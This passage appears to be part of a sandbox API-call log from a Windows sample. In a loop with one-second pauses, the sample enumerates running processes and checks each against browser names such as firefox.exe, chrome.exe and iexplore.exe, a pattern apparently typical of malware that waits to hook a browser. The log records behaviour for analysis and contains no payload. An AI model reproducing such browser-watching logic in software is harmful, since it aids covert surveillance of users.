(lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0231.796] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0231.796] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0231.796] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.796] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0231.797] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0231.797] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0231.797] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0231.797] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0231.797] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.797] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0231.797] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0231.797] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0231.798] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0231.798] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0231.798] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.798] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0231.798] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0231.798] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0231.798] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0231.798] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0231.798] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.798] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0231.799] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0231.799] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0231.799] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0231.799] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0231.799] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.799] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0231.799] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0231.799] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0231.799] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0231.799] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0231.799] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.799] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0231.800] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0231.800] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0231.800] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0231.800] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0231.800] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.800] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0231.800] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0231.801] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0231.801] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0231.801] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0231.801] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.801] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0231.801] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0231.801] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0231.801] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0231.801] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0231.801] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.801] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0231.802] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0231.802] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0231.802] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0231.802] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0231.802] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.802] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0231.802] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0231.802] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0231.802] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0231.802] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0231.802] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.802] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0231.803] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0231.803] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0231.803] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0231.803] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0231.803] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.803] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0231.803] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0231.804] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0231.804] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0231.804] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0231.804] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0231.804] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0231.804] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0231.804] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0231.804] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0231.804] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0231.805] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0231.805] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0231.805] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0231.805] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0231.805] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.805] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0231.805] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0231.805] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0231.805] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0231.805] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0231.805] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.805] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0231.806] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0231.806] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0231.806] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0231.806] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0231.806] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.806] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0231.806] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0231.806] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0231.807] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0231.807] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0231.807] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.807] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0231.807] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0231.807] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0231.807] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0231.807] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0231.807] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.807] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.808] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0231.808] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0231.808] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0231.808] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0231.808] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.808] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.808] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.808] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.808] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.808] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.808] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.808] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0231.809] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0231.809] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0231.809] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0231.809] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0231.809] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.809] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.810] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.810] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.810] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.810] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0231.810] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0231.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0231.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0231.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0231.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.811] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.811] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.811] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.811] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0231.811] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.811] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.811] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0231.811] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0231.811] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0231.811] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0231.811] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.811] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0231.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0231.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0231.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0231.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.812] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.813] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0231.813] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.813] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.814] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0231.814] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.814] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0231.815] CloseHandle (hObject=0xe8) returned 1 [0231.815] Sleep (dwMilliseconds=0x3e8) [0232.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0232.833] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.834] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0232.834] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0232.834] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0232.834] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0232.834] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0232.834] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.834] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0232.834] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0232.834] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0232.835] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0232.835] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0232.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.835] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0232.835] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0232.835] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0232.835] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0232.835] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.836] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0232.836] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0232.836] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0232.836] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0232.836] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.836] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0232.836] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0232.836] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0232.836] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0232.836] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.837] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0232.837] lstrcmpiA 